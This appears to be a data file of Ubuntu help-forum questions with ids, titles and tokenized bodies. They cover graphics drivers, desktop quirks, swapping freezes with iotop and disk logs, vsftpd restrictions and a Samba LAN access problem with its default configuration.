65373	is radeon hd 6950 working with 11.10 ?	i have tried to install the amd proprietary driver by following this guide http : //wiki.cchtml.com/index.php/ubuntu_natty_installation_guide but i guess i did n't succeed . in the standard unity mode , the movement of the windows were really slow/laggy , but the 2d mode was working just fine . can anyone who succeed to use 11.10 with hd6950 help me ? which driver should i use and how should i install it ?
65379	ca n't grab and move a maximized window using the mouse	i am using 11.04 and i have global menu 's disabled ( do n't remember which method i used to accomplish this ) . i have the system tray set to allow all apps , using a method i found on webupd8 and i have `` minimize to tray '' add-on for mozilla thunderbird which is set to close thunderbird to the system tray instead of quitting/closing it . problem : if i minimize or close any application to the system tray without first un-maximizing the application 's window , i am not allowed to grab any open app 's window that is maximized by the title bar using the mouse . i have to first un-maximize the app to move it . but , if i minimize an app to the unity launcher bar instead of the system tray from any position ( be it maximized or not ) i do n't have any problems . how do i make the applications behave the same way when minimizing/closing them to the system tray ?
65387	is there bittorrent software that runs in a terminal ?	i want to deploy it on my vps server , so i can download resource quickly . i want this function a lot , because some resource are in foreign country , so use this could reduce my time .
65392	tracking memory process wise on ubuntu	i have an rails 3 application with 100-200 daily unique visitors . the total memory consumed on the server ( ubuntu ) is around 1.5-2 gb . i want to know how much memory is used by each process . what are the best tools to track memory used by different processes ?
65399	pxe server to boot iso or other linux distro over network	how do i setup my ubuntu desktop to act as a pxe server to boot iso 's across the lan . and is it possible to run linux distros like linux mint , moblin etc so that boot at client would be faster . i have some intel atom kits which can run windows 7 pretty fast.. but i want them to run customized linux which can show only browsers . so i thoght of making live cd image ( iso ) and boot them from network . rather than spending money for harddrive for every clients which is not going to be used other than booting os .
65400	how do i customize the ubuntu livecd ?	i want to customize ubuntu 10.04 , below is the list of things which i want to do : install applications that i want . change openoffice version , evolution and firefox version . how do i do that ?
65402	how can i fix the broken edge flipping feature ?	since unity was used on ubuntu 11.04 beta , this problem has been distubbing me for a long time . yesterday i found the bug report and try to get it well , but still there 's one problem . https : //bugs.launchpad.net/ubuntu/+source/compiz/+bug/771448 ? comments=all i did as the post told in # 6 , edge fliping works well at first . later i found every time i reboot , the edge flipging at top will not work . after i ran `` compiz -- replace '' , it worked in the right way . i checked that report again , without seeing a better solution . so how can i deal with that problem ?
65403	upstart respawn with two child processes	i have an upstart script like so : start on runlevel [ 2345 ] respawn script exec su - ubuntu -c `` cd /opt/app ; bin/widget 2 > & 1 | logger -t 'widget ' '' end script the problem is when the widget process crashes , it does n't respawn . presumably because the logger process is still running . any way around this ?
65404	using vaapi to play 1080p videos ?	how can i use vaapi to play 1080p videos with hardware acceleration in ubuntu ?
65410	how can i install ecofont ?	ex . : on ubuntu 11.04 - how can i install ecofont ? http : //www.ecofont.com/
65413	ubuntu sometimes starts swapping like crazy for no reason	every once in a while , my ubuntu starts using the hard disk like crazy , and for 3 minutes i ca n't move the mouse nor access any console , even ctrl-alt-backspace and ctrl-alt-f1 do nothing . it is usually when doing some action ( opening a new browser tab , starting eclipse , etc ) . i think that at those times my ubuntu starts swapping like crazy , for no reason . i happens more if i have openoffice+eclipse+firefox open , but sometimes it also happens with only very simple apps open . i used iotop to record disk activity during one of those freeze . that time i only had chrome , gnome-terminal , gedit open . i had started iotop with sudo nice -20 sudo iotop -tbod10 > ~/iotop.log . it is supposed to write to the log every 10 seconds , but during the freeze it did not manage to write anything . however , the log just before the freeze ( 09:42:23 ) indicates kswapd is probably the culprit at 12.26 m/s : time tid prio user disk read disk write swapin io command 09:42:23 27 be/4 root 0.00 b/s 12.26 m/s 0.00 % 99.99 % [ kswapd0 ] 09:42:23 1828 be/4 nico 1081.85 k/s 0.00 b/s 1.78 % 61.16 % compiz 09:42:23 31484 be/4 nico 128.22 k/s 668.16 b/s 0.00 % 50.59 % python /usr/bin/indicator-weather 09:42:23 17339 be/4 nico 89.72 k/s 668.16 b/s 0.00 % 50.32 % google-chrome 09:42:23 17397 be/4 nico 806.49 k/s 0.00 b/s 2.13 % 43.42 % -- disable-client-side-phishing-detection -- enable-print-preview -- disable-webgl -- disable-gl-multisampling -- disable-accelerated-compositing -- channel=17322.0x7fc3880c0700.1895579466 09:42:23 315 be/4 root 334.08 b/s 0.00 b/s 0.00 % 37.90 % [ flush-8:0 ] 09:42:23 297 be/3 root 0.00 b/s 1670.40 b/s 0.00 % 32.57 % [ jbd2/sda1-8 ] 09:42:23 1244 be/4 root 502.75 k/s 0.00 b/s 0.77 % 31.90 % x :0 -nr -verbose -auth /var/run/gdm/auth-for-gdm-xequ73/database -nolisten tcp vt7 09:42:23 17403 be/5 nico 482.52 k/s 0.00 b/s 0.00 % 30.08 % -- disable-client-side-phishing-detection -- enable-print-preview -- disable-webgl -- disable-gl-multisampling -- disable-accelerated-compositing -- channel=17322.0x7fc386e35000.1143953050 09:42:23 17608 be/4 root 0.00 b/s 0.00 b/s 0.00 % 27.27 % [ kworker/0:2 ] 09:42:23 1857 be/4 nico 430.65 k/s 0.00 b/s 0.00 % 25.40 % indicator-multiload 09:42:23 2178 be/4 nico 100.49 k/s 0.00 b/s 0.00 % 23.91 % dropbox 09:42:23 17340 be/4 nico 448.59 k/s 0.00 b/s 3.66 % 18.24 % google-chrome 09:42:23 17322 be/4 nico 408.79 k/s 0.00 b/s 0.25 % 16.66 % google-chrome 09:42:23 17408 be/5 nico 162.47 k/s 0.00 b/s 0.37 % 15.75 % -- disable-client-side-phishing-detection -- enable-print-preview -- disable-webgl -- disable-gl-multisampling -- disable-accelerated-compositing -- channel=17322.0x7fc387166c40.2054812173 09:42:23 1836 be/4 nico 278.62 k/s 0.00 b/s 72.10 % 14.14 % nautilus 09:42:23 9266 be/4 root 78.63 k/s 0.00 b/s 0.00 % 12.74 % adb fork-server server 09:42:23 17417 be/5 nico 0.00 b/s 0.00 b/s 0.00 % 11.63 % -- disable-client-side-phishing-detection -- enable-print-preview -- disable-webgl -- disable-gl-multisampling -- disable-accelerated-compositing -- channel=17322.0x7fc386e35000.1143953050 09:42:23 17414 be/5 nico 9.79 k/s 0.00 b/s 0.00 % 11.63 % -- disable-client-side-phishing-detection -- enable-print-preview -- disable-webgl -- disable-gl-multisampling -- disable-accelerated-compositing -- channel=17322.0x7fc387166c40.2054812173 09:42:23 17416 be/4 nico 668.16 b/s 0.00 b/s 0.00 % 11.63 % -- disable-client-side-phishing-detection -- enable-print-preview -- disable-webgl -- disable-gl-multisampling -- disable-accelerated-compositing -- channel=17322.0x7fc3880c0700.1895579466 09:42:23 17237 be/4 postfix 5.55 k/s 0.00 b/s 20.29 % 9.59 % pickup -l -t fifo -u -c 09:42:23 17500 be/4 nico 27.73 k/s 0.00 b/s 0.00 % 9.39 % npwrapper.libflashplayer.so -- lang=en-us -- channel=17322.0x7fc38990c2c0.322771554 09:42:23 17399 be/4 nico 17.29 k/s 0.00 b/s 0.00 % 8.67 % -- disable-client-side-phishing-detection -- enable-print-preview -- disable-webgl -- disable-gl-multisampling -- disable-accelerated-compositing -- channel=17322.0x7fc3880c0700.1895579466 09:42:23 584 be/4 root 87.44 k/s 0.00 b/s 0.00 % 6.36 % networkmanager 09:42:23 17533 be/4 nico 47.96 k/s 0.00 b/s 0.00 % 5.88 % googletalkplugin 09:42:23 2218 be/4 nico 173.24 k/s 0.00 b/s 0.00 % 5.78 % unity-panel-service 09:42:23 1462 be/4 mysql 38.82 k/s 0.00 b/s 0.00 % 5.76 % mysqld 09:42:23 1463 be/4 mysql 5.87 k/s 0.00 b/s 0.00 % 5.65 % mysqld 09:42:23 29621 be/4 nico 32.95 k/s 0.00 b/s 0.00 % 4.43 % python /usr/bin/indicator-weather 09:42:23 1382 be/4 root 39.48 k/s 0.00 b/s 0.00 % 4.15 % apache2 -k start 09:42:23 17513 be/4 nico 119.41 k/s 0.00 b/s 0.00 % 4.06 % npviewer.bin -- plugin /usr/lib/flashplugin-installer/libflashplayer.so -- connection /org/wrapper/nsplugins/libflashplayer.so/17500-2 09:42:23 17335 be/4 nico 21.86 k/s 1670.40 b/s 0.00 % 4.02 % google-chrome 09:42:23 2201 be/4 nico 10.11 k/s 0.00 b/s 0.00 % 3.85 % bamfdaemon 09:42:23 1842 be/4 nico 30.34 k/s 0.00 b/s 0.00 % 3.23 % gnome-power-manager 09:42:23 1812 be/4 nico 26.10 k/s 0.00 b/s 0.00 % 2.89 % gnome-settings-daemon 09:42:23 1848 be/4 nico 38.17 k/s 0.00 b/s 0.00 % 2.55 % indicator-sensors 09:42:23 12233 be/4 root 31.32 k/s 1002.24 b/s 2.06 % 2.54 % python /usr/bin/iotop -tbod10 09:42:23 1915 be/4 nico 10.11 k/s 0.00 b/s 0.00 % 2.27 % gvfs-afc-volume-monitor 09:42:23 1831 be/4 nico 10.44 k/s 0.00 b/s 0.00 % 2.13 % compiz 09:42:23 1464 be/4 mysql 20.88 k/s 0.00 b/s 0.00 % 1.84 % mysqld 09:42:23 2309 be/4 nico 18.92 k/s 0.00 b/s 0.00 % 1.79 % unity-applications-daemon 09:42:23 17337 be/4 nico 9.14 k/s 0.00 b/s 0.00 % 1.74 % google-chrome 09:42:23 17343 be/4 nico 13.38 k/s 0.00 b/s 0.00 % 1.72 % google-chrome 09:42:23 1252 be/4 root 51.55 k/s 0.00 b/s 0.00 % 1.65 % master 09:42:23 1907 be/4 root 18.27 k/s 0.00 b/s 0.00 % 1.21 % udisks-daemon : polling /dev/sr0 09:42:23 2186 be/4 nico 46.00 k/s 0.00 b/s 0.00 % 1.13 % python /usr/share/system-config-printer/applet.py 09:42:23 1862 be/4 nico 5.22 k/s 0.00 b/s 0.00 % 0.98 % indicator-multiload 09:42:23 2199 be/4 nico 26.10 k/s 0.00 b/s 0.00 % 0.90 % unity-window-decorator 09:42:23 906 be/4 root 2.28 k/s 0.00 b/s 0.00 % 0.82 % irqbalance 09:42:23 580 be/4 avahi 32.63 k/s 0.00 b/s 0.00 % 0.59 % avahi-daemon : running [ nico.local ] 09:42:23 1877 be/4 nico 18.60 k/s 0.00 b/s 0.00 % 0.57 % notify-osd 09:42:23 17360 be/4 nico 43.72 k/s 0.00 b/s 26.23 % 0.51 % -- disable-client-side-phishing-detection -- enable-print-preview -- disable-webgl -- disable-gl-multisampling -- disable-accelerated-compositing -- channel=17322.0x7fc38672e8c0.1339188300 09:42:23 1800 be/4 nico 27.73 k/s 0.00 b/s 0.00 % 0.34 % dbus-daemon -- fork -- print-pid 5 -- print-address 7 -- session 09:42:23 627 be/4 root 10.44 k/s 0.00 b/s 0.00 % 0.33 % wpa_supplicant -u -s 09:42:23 2243 be/4 nico 3.59 k/s 0.00 b/s 0.00 % 0.33 % indicator-application-service 09:42:23 2284 be/4 nico 6.20 k/s 0.00 b/s 0.00 % 0.19 % update-notifier 09:42:23 2234 be/4 nico 0.00 b/s 0.00 b/s 0.00 % 0.18 % indicator-application-service 09:42:23 2220 be/4 nico 4.24 k/s 0.00 b/s 0.00 % 0.10 % unity-panel-service 09:42:23 17362 be/4 nico 7.83 k/s 0.00 b/s 2.54 % 0.00 % -- disable-client-side-phishing-detection -- enable-print-preview -- disable-webgl -- disable-gl-multisampling -- disable-accelerated-compositing -- channel=17322.0x7fc38672e540.2001766922 09:42:23 17412 be/5 nico 0.00 b/s 0.00 b/s 9.26 % 0.00 % -- disable-client-side-phishing-detection -- enable-print-preview -- disable-webgl -- disable-gl-multisampling -- disable-accelerated-compositing -- channel=17322.0x7fc3880afa80.2009126862 time tid prio user disk read disk write swapin io command 09:45:22 17596 be/4 root 0.00 b/s 0.00 b/s 0.00 % 99.99 % [ kworker/1:0 ] 09:45:22 17608 be/4 root 0.00 b/s 0.00 b/s 0.00 % 98.44 % [ kworker/0:2 ] 09:45:22 315 be/4 root 808.56 b/s 17.81 k/s 0.00 % 86.79 % [ flush-8:0 ] 09:45:22 1828 be/4 nico 621.79 k/s 0.00 b/s 16.33 % 86.29 % compiz 09:45:22 17340 be/4 nico 815.78 k/s 0.00 b/s 14.61 % 83.30 % google-chrome 09:45:22 1857 be/4 nico 575.28 k/s 0.00 b/s 12.32 % 82.64 % indicator-multiload 09:45:22 1812 be/4 nico 540.14 k/s 0.00 b/s 3.06 % 81.94 % gnome-settings-daemon 09:45:22 1848 be/4 nico 541.02 k/s 0.00 b/s 12.30 % 81.58 % indicator-sensors 09:45:22 584 be/4 root 606.07 k/s 0.00 b/s 11.51 % 78.40 % networkmanager 09:45:22 906 be/4 root 308.53 k/s 0.00 b/s 0.00 % 76.26 % irqbalance 09:45:22 17335 be/4 nico 18.79 k/s 332.94 b/s 8.56 % 60.25 % google-chrome 09:45:22 1382 be/4 root 361.76 k/s 0.00 b/s 0.00 % 49.17 % apache2 -k start 09:45:22 17533 be/4 nico 282.38 k/s 0.00 b/s 0.00 % 45.30 % googletalkplugin 09:45:22 17550 be/4 nico 134.88 k/s 0.00 b/s 0.00 % 40.96 % npviewer.bin -- plugin /usr/lib/flashplugin-installer/libflashplayer.so -- connection /org/wrapper/nsplugins/libflashplayer.so/17500-2 09:45:22 2309 be/4 nico 260.08 k/s 0.00 b/s 0.00 % 38.69 % unity-applications-daemon 09:45:22 1463 be/4 mysql 171.28 k/s 0.00 b/s 0.00 % 38.61 % mysqld 09:45:22 17360 be/4 nico 377.27 k/s 0.00 b/s 2.14 % 37.14 % -- disable-client-side-phishing-detection -- enable-print-preview -- disable-webgl -- disable-gl-multisampling -- disable-accelerated-compositing -- channel=17322.0x7fc38672e8c0.1339188300 09:45:22 1888 be/4 nico 177.20 k/s 0.00 b/s 8.69 % 35.51 % python /usr/lib/desktopcouch/desktopcouch-service 09:45:22 2172 be/4 nico 64.52 k/s 0.00 b/s 3.93 % 35.19 % dropbox 09:45:22 17536 be/4 nico 71.95 k/s 0.00 b/s 0.00 % 32.79 % npviewer.bin -- plugin /usr/lib/flashplugin-installer/libflashplayer.so -- connection /org/wrapper/nsplugins/libflashplayer.so/17500-2 09:45:22 9266 be/4 root 106.53 k/s 0.00 b/s 0.00 % 28.34 % adb fork-server server 09:45:22 17351 be/4 nico 225.76 k/s 0.00 b/s 1.69 % 27.98 % -- disable-client-side-phishing-detection -- enable-print-preview -- disable-webgl -- disable-gl-multisampling -- disable-accelerated-compositing -- channel=17322.0x7fc3866eae00.1806036416 09:45:22 17412 be/5 nico 165.21 k/s 0.00 b/s 0.00 % 24.66 % -- disable-client-side-phishing-detection -- enable-print-preview -- disable-webgl -- disable-gl-multisampling -- disable-accelerated-compositing -- channel=17322.0x7fc3880afa80.2009126862 09:45:22 2179 be/4 nico 58.25 k/s 0.00 b/s 24.18 % 22.89 % dropbox 09:45:22 2178 be/4 nico 29.63 k/s 0.00 b/s 0.00 % 22.83 % dropbox 09:45:22 2284 be/4 nico 139.46 k/s 0.00 b/s 3.82 % 21.98 % update-notifier 09:45:22 627 be/4 root 89.74 k/s 0.00 b/s 74.21 % 21.71 % wpa_supplicant -u -s 09:45:22 2218 be/4 nico 129.89 k/s 0.00 b/s 76.33 % 21.59 % unity-panel-service 09:45:22 17532 be/4 nico 94.64 k/s 0.00 b/s 0.00 % 21.24 % googletalkplugin 09:45:22 9652 be/4 nico 12.91 k/s 0.00 b/s 0.00 % 20.14 % ruby script/rails console 09:45:22 17408 be/5 nico 152.30 k/s 0.00 b/s 83.52 % 17.19 % -- disable-client-side-phishing-detection -- enable-print-preview -- disable-webgl -- disable-gl-multisampling -- disable-accelerated-compositing -- channel=17322.0x7fc387166c40.2054812173 09:45:22 17362 be/4 nico 178.41 k/s 0.00 b/s 1.63 % 16.11 % -- disable-client-side-phishing-detection -- enable-print-preview -- disable-webgl -- disable-gl-multisampling -- disable-accelerated-compositing -- channel=17322.0x7fc38672e540.2001766922 09:45:22 1907 be/4 root 93.99 k/s 0.00 b/s 0.00 % 15.71 % udisks-daemon : polling /dev/sr0 09:45:22 27 be/4 root 0.00 b/s 136.18 m/s 0.00 % 15.66 % [ kswapd0 ] 09:45:22 1915 be/4 nico 30.82 k/s 0.00 b/s 0.00 % 13.92 % gvfs-afc-volume-monitor 09:45:22 17403 be/5 nico 107.90 k/s 0.00 b/s 89.46 % 12.11 % -- disable-client-side-phishing-detection -- enable-print-preview -- disable-webgl -- disable-gl-multisampling -- disable-accelerated-compositing -- channel=17322.0x7fc386e35000.1143953050 09:45:22 1839 be/4 nico 60.13 k/s 0.00 b/s 21.61 % 9.98 % nm-applet -- sm-disable 09:45:22 1244 be/4 root 105.58 k/s 0.00 b/s 84.86 % 9.73 % x :0 -nr -verbose -auth /var/run/gdm/auth-for-gdm-xequ73/database -nolisten tcp vt7 09:45:22 1462 be/4 mysql 29.35 k/s 0.00 b/s 9.90 % 8.99 % mysqld 09:45:22 1464 be/4 mysql 26.41 k/s 0.00 b/s 0.00 % 8.55 % mysqld i am using ubuntu 2011.04 with encrypted home and 4gb physical memory + 4gb swap : free -m total used free shared buffers cached mem : 3894 3044 850 0 94 935 -/+ buffers/cache : 2013 1880 swap : 4023 942 3081 i have much more ram that i actually need , so this swapping craziness is baffling . how can i stop those freezes ? update : as asked , here is the output of hdparm -idc /dev/sda1 : /dev/sda1 : io_support = 1 ( 32-bit ) hdio_get_dma failed : inappropriate ioctl for device ata device , with non-removable media model number : fujitsu mja2500bh g2 serial number : k95ft9a26pnt firmware revision : 0084001c transport : serial , ata8-ast , sata 1.0a , sata ii extensions , sata rev 2.5 , sata rev 2.6 standards : used : ata-8-acs revision 3f supported : 8 7 6 5 configuration : logical max current cylinders 16383 16383 heads 16 16 sectors/track 63 63 -- chs current addressable sectors : 16514064 lba user addressable sectors : 268435455 lba48 user addressable sectors : 976773168 logical sector size : 512 bytes physical sector size : 512 bytes device size with m = 1024*1024 : 476940 mbytes device size with m = 1000*1000 : 500107 mbytes ( 500 gb ) cache/buffer size = 8192 kbytes ( type=dualportcache ) form factor : 2.5 inch nominal media rotation rate : 5400 capabilities : lba , iordy ( can be disabled ) queue depth : 32 standby timer values : spec 'd by standard , no device specific minimum r/w multiple sector transfer : max = 16 current = 16 advanced power management level : disabled recommended acoustic management value : 254 , current value : 254 dma : mdma0 mdma1 mdma2 udma0 udma1 udma2 udma3 udma4 *udma5 cycle time : min=120ns recommended=120ns pio : pio0 pio1 pio2 pio3 pio4 cycle time : no flow control=120ns iordy flow control=120ns commands/features : enabled supported : * smart feature set security mode feature set * power management feature set * write cache * look-ahead * host protected area feature set * write_buffer command * read_buffer command * download_microcode advanced power management feature set set_max security extension * automatic acoustic management feature set * 48-bit address feature set * device configuration overlay feature set * mandatory flush_cache * flush_cache_ext * smart error logging * smart self-test * general purpose logging feature set * write_ { dma|multiple } _fua_ext * 64-bit world wide name * idle_immediate with unload * disable data transfer after error detection * write_uncorrectable_ext command * { read , write } _dma_ext_gpl commands * segmented download_microcode * gen1 signaling speed ( 1.5gb/s ) * gen2 signaling speed ( 3.0gb/s ) * native command queueing ( ncq ) * host-initiated interface power management * phy event counters * ncq priority information * dma setup auto-activate optimization device-initiated interface power management * software settings preservation * smart command transport ( sct ) feature set * sct lba segment access ( ac2 ) * sct error recovery control ( ac3 ) * sct features control ( ac4 ) * sct data tables ( ac5 ) result of sdparm /dev/sda : /dev/sda : ata fujitsu mja2500b 0084 read write error recovery mode page : awre 1 arre 0 per 0 caching ( sbc ) mode page : wce 1 rcd 0 control mode page : swp 0 result of smartctl -l selftest /dev/sda : smart self-test log structure revision number 1 num test_description status remaining lifetime ( hours ) lba_of_first_error # 1 vendor offline completed without error 00 % 0 -
65418	how do i restrict vsftpd access to a certain directory ?	i would like to give a user access to our ftp server . not to everything , just the directory he needs to work in . when he logs in he should be directed to /var/www/hisdir and not be able to go outside it . i 've read about restricting a user to his home directory but not to other directories . if this is not possible with vsftpd is there maybe something thats more configurable ?
65420	sound distortion with intel hda when using stereo output , but not with `` 4.0 surround ''	similar to http : //somethingkindawierd.com/blog/computers/linux-computers/10/2010/fix-ubuntu-10-04-popping-sound-on-macbook/ but i 'm not on a macbook , but a dell m1210 with intel corporation n10/ich 7 family high definition audio controller ( rev 01 ) on ubuntu 11.10 . with stereo output/duplex enabled ( default ) i get distorted sounds at relatively low volumes , but switching to `` 4.0 surrond fixes it '' . is this a known bug that still has n't been fixed ?
65424	alt key in autodesk maya 2011 using gnome	this might be a dumb question , but i 've googgled and searched for it and could n't find any good answer . i am using maya 2011 , which usually uses the alt key as a shortcut by default for a lot of things ( select objects , etc ... ) . however , since gnome uses alt + click to drag windows , maya does not let me use alt for anything , and apparently the windows key has taken now this role , so i can select objects through windows key + click while alt + click drags the whole window . i know i can change the alt key behaviour in gnome in windows preferences - > movement key , but this does only changes alt behaviour in gnome , while maya still uses windows key for selection . i am asking this because in kde was a very simple thing to change , i remember i just changed something about modifier key , and it all went back to normal , without changing any configuration inside maya , and i believe gnome has to have a similar option that i can not find . thanks !
65426	unable to connect my computer from lan ( http , smb ) in 10.04	i installed ubuntu 10.04 , apache , php , mysql , smb . everything work fine in locally in my ip . when i try to access my computer from lan ( other computer ) , it shows unable to connect . when i ping my ip from remote computer , it 's pinging ok . i can access internet , and all other systems ( http , smb ) . but the problem is that no one can access my computer remotely in my lan network . my ip is 192.168.85.105 and i want access ( appaceh , smb ) from 192.168.85.10 . is there any proxy firewall settings ? i had tried following commands.. sudo iptables -f or sudo iptables-restore [ logout require ] if it does not work then try to disable net-filter sudo ufw -- disable the output of ifconfig -a : ashok @ ashok-desktop : ~ $ ifconfig -a eth0 link encap : ethernet hwaddr 48:5b:39 : c7:32 : d4 inet addr:192.168.85.105 bcast:192.168.85.255 mask:255.255.255.0 inet6 addr : fe80 : :4a5b:39ff : fec7:32d4/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:37711 errors:0 dropped:0 overruns:0 frame:0 tx packets:21554 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:18837366 ( 18.8 mb ) tx bytes:5067210 ( 5.0 mb ) interrupt:27 base address:0xe000 [ smb configuration file ] # # sample configuration file for the samba suite for debian gnu/linux . # # # this is the main samba configuration file . you should read the # smb.conf ( 5 ) manual page in order to understand the options listed # here . samba has a huge number of configurable options most of which # are not shown in this example # # some options that are often worth tuning have been included as # commented-out examples in this file . # - when such options are commented with `` ; '' , the proposed setting # differs from the default samba behaviour # - when commented with `` # '' , the proposed setting is the default # behaviour of samba but the option is considered important # enough to be mentioned here # # note : whenever you modify this file you should run the command # `` testparm '' to check that you have not made any basic syntactic # errors . # a well-established practice is to name the original file # `` smb.conf.master '' and create the `` real '' config file with # testparm -s smb.conf.master > smb.conf # this minimizes the size of the really used smb.conf file # which , according to the samba team , impacts performance # however , use this with caution if your smb.conf file contains nested # `` include '' statements . see debian bug # 483187 for a case # where using a master file is not a good idea . # # ======================= global settings ======================= [ global ] # # browsing/identification # # # # change this to the workgroup/nt-domain name your samba server will part of workgroup = workgroup # server string is the equivalent of the nt description field server string = % h server ( samba , ubuntu ) # windows internet name serving support section : # wins support - tells the nmbd component of samba to enable its wins server # wins support = no # wins server - tells the nmbd components of samba to be a wins client # note : samba can be either a wins server , or a wins client , but not both ; wins server = w.x.y.z # this will prevent nmbd to search for netbios names through dns . dns proxy = no # what naming service and in what order should we use to resolve host names # to ip addresses ; name resolve order = lmhosts host wins bcast # # # # networking # # # # # the specific set of interfaces / networks to bind to # this can be either the interface name or an ip address/netmask ; # interface names are normally preferred ; interfaces = 127.0.0.0/8 eth0 # only bind to the named interfaces and/or networks ; you must use the # 'interfaces ' option above to use this . # it is recommended that you enable this feature if your samba machine is # not protected by a firewall or is a firewall itself . however , this # option can not handle dynamic or non-broadcast interfaces correctly . ; bind interfaces only = yes # # # # debugging/accounting # # # # # this tells samba to use a separate log file for each machine # that connects log file = /var/log/samba/log. % m # cap the size of the individual log files ( in kib ) . max log size = 1000 # if you want samba to only log through syslog then set the following # parameter to 'yes ' . # syslog only = no # we want samba to log a minimum amount of information to syslog . everything # should go to /var/log/samba/log . { smbd , nmbd } instead . if you want to log # through syslog you should set the following parameter to something higher . syslog = 0 # do something sensible when samba crashes : mail the admin a backtrace panic action = /usr/share/samba/panic-action % d # # # # # # # authentication # # # # # # # # `` security = user '' is always a good idea . this will require a unix account # in this server for every user accessing the server . see # /usr/share/doc/samba-doc/htmldocs/samba3-howto/servertype.html # in the samba-doc package for details . # security = user # you may wish to use password encryption . see the section on # 'encrypt passwords ' in the smb.conf ( 5 ) manpage before enabling . encrypt passwords = true # if you are using encrypted passwords , samba will need to know what # password database type you are using . passdb backend = tdbsam obey pam restrictions = yes # this boolean parameter controls whether samba attempts to sync the unix # password with the smb password when the encrypted smb password in the # passdb is changed . unix password sync = yes # for unix password sync to work on a debian gnu/linux system , the following # parameters must be set ( thanks to ian kahan < < kahan @ informatik.tu-muenchen.de > for # sending the correct chat script for the passwd program in debian sarge ) . passwd program = /usr/bin/passwd % u passwd chat = *enter\snew\s*\spassword : * % n\n *retype\snew\s*\spassword : * % n\n *password\supdated\ssuccessfully* . # this boolean controls whether pam will be used for password changes # when requested by an smb client instead of the program listed in # 'passwd program ' . the default is 'no ' . pam password change = yes # this option controls how unsuccessful authentication attempts are mapped # to anonymous connections map to guest = bad user # # # # # # # # # # domains # # # # # # # # # # # # is this machine able to authenticate users . both pdc and bdc # must have this setting enabled . if you are the bdc you must # change the 'domain master ' setting to no # ; domain logons = yes # # the following setting only takes effect if 'domain logons ' is set # it specifies the location of the user 's profile directory # from the client point of view ) # the following required a [ profiles ] share to be setup on the # samba server ( see below ) ; logon path = \\ % n\profiles\ % u # another common choice is storing the profile in the user 's home directory # ( this is samba 's default ) # logon path = \\ % n\ % u\profile # the following setting only takes effect if 'domain logons ' is set # it specifies the location of a user 's home directory ( from the client # point of view ) ; logon drive = h : # logon home = \\ % n\ % u # the following setting only takes effect if 'domain logons ' is set # it specifies the script to run during logon . the script must be stored # in the [ netlogon ] share # note : must be store in 'dos ' file format convention ; logon script = logon.cmd # this allows unix users to be created on the domain controller via the samr # rpc pipe . the example command creates a user account with a disabled unix # password ; please adapt to your needs ; add user script = /usr/sbin/adduser -- quiet -- disabled-password -- gecos `` '' % u # this allows machine accounts to be created on the domain controller via the # samr rpc pipe . # the following assumes a `` machines '' group exists on the system ; add machine script = /usr/sbin/useradd -g machines -c `` % u machine account '' -d /var/lib/samba -s /bin/false % u # this allows unix groups to be created on the domain controller via the samr # rpc pipe . ; add group script = /usr/sbin/addgroup -- force-badname % g # # # # # # # # # # printing # # # # # # # # # # # if you want to automatically load your printer list rather # than setting them up individually then you 'll need this # load printers = yes # lpr ( ng ) printing . you may wish to override the location of the # printcap file ; printing = bsd ; printcap name = /etc/printcap # cups printing . see also the cupsaddsmb ( 8 ) manpage in the # cupsys-client package . ; printing = cups ; printcap name = cups # # # # # # # # # # # # misc # # # # # # # # # # # # # using the following line enables you to customise your configuration # on a per machine basis . the % m gets replaced with the netbios name # of the machine that is connecting ; include = /home/samba/etc/smb.conf. % m # most people will find that this option gives better performance . # see smb.conf ( 5 ) and /usr/share/doc/samba-doc/htmldocs/samba3-howto/speed.html # for details # you may want to add the following on a linux system : # so_rcvbuf=8192 so_sndbuf=8192 # socket options = tcp_nodelay # the following parameter is useful only if you have the linpopup package # installed . the samba maintainer and the linpopup maintainer are # working to ease installation and configuration of linpopup and samba . ; message command = /bin/sh -c '/usr/bin/linpopup `` % f '' `` % m '' % s ; rm % s ' & # domain master specifies samba to be the domain master browser . if this # machine will be configured as a bdc ( a secondary logon server ) , you # must set this to 'no ' ; otherwise , the default behavior is recommended . # domain master = auto # some defaults for winbind ( make sure you 're not using the ranges # for something else . ) ; idmap uid = 10000-20000 ; idmap gid = 10000-20000 ; template shell = /bin/bash # the following was the default behaviour in sarge , # but samba upstream reverted the default because it might induce # performance issues in large organizations . # see debian bug # 368251 for some of the consequences of *not* # having this setting and smb.conf ( 5 ) for details . ; winbind enum groups = yes ; winbind enum users = yes # setup usershare options to enable non-root users to share folders # with the net usershare command . # maximum number of usershare . 0 ( default ) means that usershare is disabled . ; usershare max shares = 100 # allow users who 've been granted usershare privileges to create # public shares , not just authenticated ones usershare allow guests = yes # ======================= share definitions ======================= # un-comment the following ( and tweak the other settings below to suit ) # to enable the default home directory shares . this will share each # user 's home directory as \\server\username ; [ homes ] ; comment = home directories ; browseable = no # by default , the home directories are exported read-only . change the # next parameter to 'no ' if you want to be able to write to them . ; read only = yes # file creation mask is set to 0700 for security reasons . if you want to # create files with group=rw permissions , set next parameter to 0775. ; create mask = 0700 # directory creation mask is set to 0700 for security reasons . if you want to # create dirs . with group=rw permissions , set next parameter to 0775. ; directory mask = 0700 # by default , \\server\username shares can be connected to by anyone # with access to the samba server . un-comment the following parameter # to make sure that only `` username '' can connect to \\server\username # this might need tweaking when using external authentication schemes ; valid users = % s # un-comment the following and create the netlogon directory for domain logons # ( you need to configure samba to act as a domain controller too . ) ; [ netlogon ] ; comment = network logon service ; path = /home/samba/netlogon ; guest ok = yes ; read only = yes ; share modes = no # un-comment the following and create the profiles directory to store # users profiles ( see the `` logon path '' option above ) # ( you need to configure samba to act as a domain controller too . ) # the path below should be writable by all users so that their # profile directory may be created the first time they log on ; [ profiles ] ; comment = users profiles ; path = /home/samba/profiles ; guest ok = no ; browseable = no ; create mask = 0600 ; directory mask = 0700 [ printers ] comment = all printers browseable = no path = /var/spool/samba printable = yes guest ok = no read only = yes create mask = 0700 # windows clients look for this share name as a source of downloadable # printer drivers [ print $ ] comment = printer drivers path = /var/lib/samba/printers browseable = yes read only = yes guest ok = no # uncomment to allow remote administration of windows print drivers . # you may need to replace 'lpadmin ' with the name of the group your # admin users are members of . # please note that you also need to set appropriate unix permissions # to the drivers directory for these users to have write rights in it ; write list = root , @ lpadmin # a sample share for sharing your cd-rom with others . ; [ cdrom ] ; comment = samba server 's cd-rom ; read only = yes ; locking = no ; path = /cdrom ; guest ok = yes # the next two parameters show how to auto-mount a cd-rom 